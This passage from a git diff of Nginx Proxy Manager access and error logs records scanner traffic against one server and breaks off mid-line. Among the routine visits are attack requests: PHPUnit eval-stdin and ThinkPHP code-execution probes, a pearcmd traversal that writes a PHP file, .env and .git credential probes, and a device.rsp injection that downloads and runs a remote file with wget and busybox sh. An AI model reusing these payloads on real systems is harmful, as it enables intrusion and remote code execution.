"/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:31 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:31 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:15:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:17:17:25 +0000] 404 - GET http 222.117.41.51 "/.git/credentials" [Client 195.178.110.246] [Length 122] [Gzip 1.35] "Screaming Frog SEO Spider/8.1" "-" -[18/Feb/2026:17:29:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:17:35:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:17:41:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:17:55:39 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 85.11.167.7] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.8" "-" -[18/Feb/2026:18:08:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:18:16:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:18:23:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:18:31:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:18:49:16 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" -[18/Feb/2026:18:50:51 +0000] 400 - GET http 222.117.41.51 "/" [Client 44.220.188.205] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3036.94 Safari/537.32" "-" -[18/Feb/2026:18:51:32 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.242.226.111] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" -[18/Feb/2026:18:56:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.157.180.116] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[18/Feb/2026:18:56:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:19:01:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 185.226.197.74] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" -[18/Feb/2026:19:14:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:19:22:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:19:48:55 +0000] 404 - GET http httpbin.org "/ip" [Client 87.121.84.172] [Length 122] [Gzip 1.35] "ProxyPool-Scanner/2.0" "-" -[18/Feb/2026:19:49:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:20:04:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:20:13:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:20:14:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:20:15:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:20:21:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.83] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:20:21:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.83] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:20:24:48 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" -[18/Feb/2026:20:41:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:20:48:06 +0000] 400 - - http localhost "-" [Client 59.173.109.47] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:20:48:23 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.249.60.2] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:20:48:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 220.167.232.168] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:20:49:36 +0000] 400 - GET http 222.117.41.51 "/" [Client 220.167.232.37] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:20:55:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.92.1.85] [Length 0] [Gzip -] "-" "-" -[18/Feb/2026:20:57:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.153.104.196] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[18/Feb/2026:21:03:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:21:03:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[18/Feb/2026:21:03:20 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[18/Feb/2026:21:03:20 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 115.231.78.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[18/Feb/2026:21:06:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:21:09:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:21:30:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:21:44:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:21:49:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:21:56:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:22:04:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[18/Feb/2026:22:07:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.149.27] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:22:07:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:22:18:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:22:20:34 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.234] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[18/Feb/2026:22:22:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:22:29:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.202.9.133] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)" "-" -[18/Feb/2026:22:46:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:23:59:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:00:01:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:00:03:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:00:14:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[19/Feb/2026:00:30:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:00:48:14 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[19/Feb/2026:00:48:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:00:48:15 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[19/Feb/2026:00:48:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:00:48:17 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[19/Feb/2026:00:59:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:01:01:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.169.91.53] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:01:01:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.156.129.66] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[19/Feb/2026:01:01:17 +0000] 404 - POST http 222.117.41.51 "/mcp" [Client 45.156.129.65] [Length 122] [Gzip 1.35] "python-httpx/0.28.1" "-" +[19/Feb/2026:01:01:17 +0000] 404 - GET http 222.117.41.51 "/sse" [Client 45.156.129.65] [Length 122] [Gzip 1.35] "python-httpx/0.28.1" "-" +[19/Feb/2026:01:01:18 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Feb/2026:01:19:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.242.226.110] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:01:19:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:01:29:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 85.217.149.41] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)" "-" +[19/Feb/2026:01:29:11 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Feb/2026:01:46:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:01:53:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "-" "-" +[19/Feb/2026:02:03:18 +0000] 400 - GET http 222.117.41.51 "/" [Client 20.14.88.150] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[19/Feb/2026:02:03:19 +0000] 400 - - http localhost "-" [Client 20.14.88.150] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:02:05:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.156.128.203] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Feb/2026:02:33:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.11.182.19] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:02:33:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 85.11.182.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:38:24 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 40.119.33.98] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[19/Feb/2026:02:44:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Feb/2026:02:51:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.67.33] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Feb/2026:02:58:25 +0000] 400 - - http localhost "-" [Client 20.115.90.228] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:16:18 +0000] 404 - GET http 222.117.41.51 "/login" [Client 104.164.8.29] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[19/Feb/2026:03:16:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:17:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:25:01 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[19/Feb/2026:03:25:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:25:02 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[19/Feb/2026:03:25:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:25:03 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[19/Feb/2026:03:40:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.237.96.150] [Length 154] [Gzip -] "-" "-" +[19/Feb/2026:03:40:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 172.237.96.150] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[19/Feb/2026:03:43:40 +0000] 404 - GET http 222.117.41.51 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[19/Feb/2026:03:48:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.215.199.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[19/Feb/2026:03:49:45 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 195.178.110.18] [Length 150] [Gzip -] "'Mozilla/5.0" "-" +[19/Feb/2026:04:07:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.216.150.112] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" diff --git a/npm/data/logs/fallback_http_error.log b/npm/data/logs/fallback_http_error.log index f8090c6..484ae2c 100644 --- a/npm/data/logs/fallback_http_error.log +++ b/npm/data/logs/fallback_http_error.log @@ -1,674 +1,8 @@ -2026/02/14 21:50:30 [error] 200#200: *7 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/159751378329916" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/159751378329916 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/14 22:32:24 [error] 201#201: *1 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31481293126031" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/31481293126031 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/14 23:16:43 [error] 406#406: *452 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/14 23:26:45 [error] 444#444: *515 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 130.12.180.151, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.151%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc HTTP/1.1", host: "222.117.41.51:80" -2026/02/14 23:37:17 [error] 509#509: *766 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 02:44:08 [error] 519#519: *4174 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 03:02:53 [error] 526#526: *5699 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/" -2026/02/15 03:03:22 [error] 526#526: *5700 open() "/var/www/html/onvif/device_service" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "POST /onvif/device_service HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/" -2026/02/15 03:03:23 [error] 526#526: *5701 open() "/var/www/html/PSIA/index" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "GET /PSIA/index HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/" -2026/02/15 04:00:23 [error] 519#519: *5894 open() "/var/www/html/odinhttpcall1771128023" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1771128023 HTTP/1.1", host: "222.117.41.51" -2026/02/15 04:00:23 [error] 519#519: *5896 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "222.117.41.51" -2026/02/15 04:00:24 [error] 520#520: *5897 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "222.117.41.51" -2026/02/15 04:00:24 [error] 521#521: 